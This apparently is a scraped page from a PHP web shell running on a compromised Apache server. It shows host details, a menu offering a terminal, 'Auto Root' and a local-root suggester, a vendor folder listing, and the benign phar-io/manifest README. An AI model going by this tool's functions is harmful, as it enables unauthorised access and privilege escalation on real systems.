Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.119
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
html_old /
iNetty /
vendor /
phar-io /
manifest /
Delete
Unzip
Name
Size
Permission
Date
Action
src
[ DIR ]
drwxr-xr-x
2022-04-21 14:21
CHANGELOG.md
1.19
KB
-rw-r--r--
2022-04-21 14:21
LICENSE
1.59
KB
-rw-r--r--
2022-04-21 14:21
README.md
1.2
KB
-rw-r--r--
2022-04-21 14:21
composer.json
874
B
-rw-r--r--
2022-04-21 14:21
composer.lock
2.24
KB
-rw-r--r--
2022-04-21 14:21
Save
Rename
# Manifest Component for reading [phar.io](https://phar.io/) manifest information from a [PHP Archive (PHAR)](http://php.net/phar). [](https://travis-ci.org/phar-io/manifest) [](https://scrutinizer-ci.com/g/phar-io/manifest/?branch=master) [](https://insight.sensiolabs.com/projects/d8cc6035-69ad-477d-bd1a-ccc605480fd7) ## Installation You can add this library as a local, per-project dependency to your project using [Composer](https://getcomposer.org/): composer require phar-io/manifest If you only need this library during development, for instance to run your project's test suite, then you should add it as a development-time dependency: composer require --dev phar-io/manifest ## Usage ```php use PharIo\Manifest\ManifestLoader; use PharIo\Manifest\ManifestSerializer; $manifest = ManifestLoader::fromFile('manifest.xml'); var_dump($manifest); echo (new ManifestSerializer)->serializeToString($manifest); ```